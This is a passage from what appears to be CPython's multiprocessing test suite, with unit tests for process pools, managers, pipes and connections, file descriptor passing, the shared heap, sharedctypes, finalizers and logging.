self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.time()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.time() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
        # With a process pool, copies of the objects are returned; check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
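# FooBar and baz() are registered with MyManager below: 'Foo' exposes the
# public methods, 'Bar' restricts exposure to ('f', '_h'), and 'baz' uses
# IteratorProxy so the generator can be iterated through its proxy.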
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
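# get_queue() returns a module-level queue so that the manager server and
# its clients all share the same underlying Queue object.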
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
        # Note that xmlrpclib will deserialize the object as a list, not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.shutdown()
#
#
#
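# SENTINEL is an empty byte string; _TestConnection._echo() keeps echoing
# received messages back until it reads SENTINEL, then closes its end.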
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
        really_big_msg = latin('X') * (1024 * 1024 * 16)  # 16 MiB
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
    def _send_data_without_fd(cls, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
        # On Windows the client process should by now have connected,
        # written data and closed the pipe handle. This causes
        # ConnectNamedPipe() to fail with ERROR_NO_DATA. See Issue
        # 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
        # Polling may "pull" a message into the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=5)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
#
#
#
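# _TestHeap stresses the private arena allocator in multiprocessing.heap by
# creating and dropping many BufferWrapper blocks of random sizes, then
# checking that the free and occupied block lists are consistent.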
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
heap._lock.acquire()
self.addCleanup(heap._lock.release)
for L in list(heap._len_to_seq.values()):
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
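# _Foo is a small ctypes Structure shared between processes by the
# sharedctypes tests below.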
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, foo, arr, string):
x.value *= 2
y.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0)
bar = copy(foo)
foo.x = 0
foo.y = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
#
#
#
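# _TestFinalize checks util.Finalize callbacks: they fire on garbage
# collection, on explicit calls (at most once), and in exit-priority order
# when util._exit_function() runs.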
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
        self.assertIsNotNone(logger)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.daemon = True
p.start()
self.assertEqual(LEVEL1, reader.recv())
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.daemon = True
p.start()
self.assertEqual(LEVEL2, reader.recv())
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
